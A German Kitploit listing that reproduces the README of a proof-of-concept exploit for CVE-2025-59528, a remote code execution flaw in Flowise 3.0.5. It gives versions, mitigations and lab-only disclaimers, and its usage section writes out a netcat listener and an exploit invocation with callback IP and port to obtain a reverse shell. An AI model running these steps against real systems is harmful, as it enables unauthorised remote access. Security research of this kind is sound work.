Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-59528-PoC — Der PoC für CVE-2025-59528 | Kitploit
Tools/GitHubGitHub/sonnelon/cve-2025-59528-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

Der PoC für CVE-2025-59528

Repository anzeigen
5vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59528 PoC

Proof of Concept für die Untersuchung von CVE-2025-59528 in einer isolierten Laborumgebung.

[!WARNING] HAFTUNGSAUSSCHLUSS

Dieses Projekt dient ausschließlich Bildungszwecken, der Sicherheitsforschung und dem Testen von Systemen, die dir gehören oder für deren Test du eine ausdrückliche Genehmigung hast.

Verwende diesen PoC nicht gegen Server Dritter, öffentliche Dienste oder Infrastruktur ohne die Erlaubnis des Eigentümers.

Der Autor haftet nicht für Schäden, Datenverlust, Dienstunterbrechungen oder rechtliche Konsequenzen, die aus der missbräuchlichen Verwendung dieses Projekts resultieren.

Beschreibung

Dieser PoC demonstriert die potenziellen Auswirkungen von CVE-2025-59528, einer Sicherheitslücke, die die Verarbeitung der benutzergesteuerten mcpServerConfig-Konfiguration in Flowise betrifft.

Unter bestimmten Bedingungen kann die Sicherheitslücke es einem Angreifer ermöglichen, beliebigen JavaScript-Code im serverseitigen Kontext auszuführen.

Betroffene Versionen

  • Flowise 3.0.5

Behobene Version

  • Flowise 3.0.6+

Überprüfe vor dem Test immer die genaue Version der Zielinstallation.

Voraussetzungen

  • Python 3
  • requests
  • Eine lokale oder isolierte Flowise-Testinstanz
  • Ein autorisiertes Konto mit den erforderlichen Berechtigungen

Installiere die Python-Abhängigkeit:

pip install requests

Verwendung

Starte netcat, um eine Shell zu erhalten:

nc -lvnp <YOUR_PORT>

Führe den PoC aus:

python3 poc.py \
    -t http://TARGET:PORT \
    -o api_key \
    -i CALLBACK_IP \
    -p CALLBACK_PORT

Argumente

ArgumentBeschreibung
-t, --targetURL der Flowise-Testinstanz
-o, --api_keyAPI-Schlüssel
-i, --ipIP-Adresse der Testmaschine
-p, --portPort der Testumgebung

Laboraufbau

Tests sollten innerhalb eines isolierten virtuellen oder Labor-Netzwerks durchgeführt werden.

┌──────────────────┐
│    PoC Machine   │
│                  │
│    Python PoC    │
└────────┬─────────┘
         │
         │ Isolated Network
         │
┌────────▼─────────┐
│   Flowise 3.0.5  │
│   Test Instance  │
└──────────────────┘

Setze eine absichtlich verwundbare Flowise-Instanz nicht direkt dem öffentlichen Internet aus.

Gegenmaßnahmen

Wenn du eine betroffene Flowise-Version ausführst:

  1. Aktualisiere Flowise auf eine gepatchte Version.
  2. Beschränke den Zugriff auf administrative APIs.
  3. Vermeide es, nicht vertrauenswürdigen Benutzern die Berechtigungen zu erteilen, die für den Zugriff auf die anfällige Funktionalität erforderlich sind.
  4. Überprüfe die Server-Logs auf verdächtige Anfragen.
  5. Teste die Installation nach dem Upgrade erneut.

Referenzen

  • CVE: CVE-2025-59528
  • Betroffene Software: Flowise
  • Behobene Version: 3.0.6+

Rechtlicher Hinweis

Durch die Verwendung dieses Projekts erkennst du an, dass du allein für die Einhaltung aller geltenden Gesetze und Vorschriften verantwortlich bist.

Verwende diesen PoC nur gegen Systeme, die dir gehören, oder gegen Systeme, für die du eine ausdrückliche Genehmigung zur Durchführung von Sicherheitstests hast.

Tool herunterladen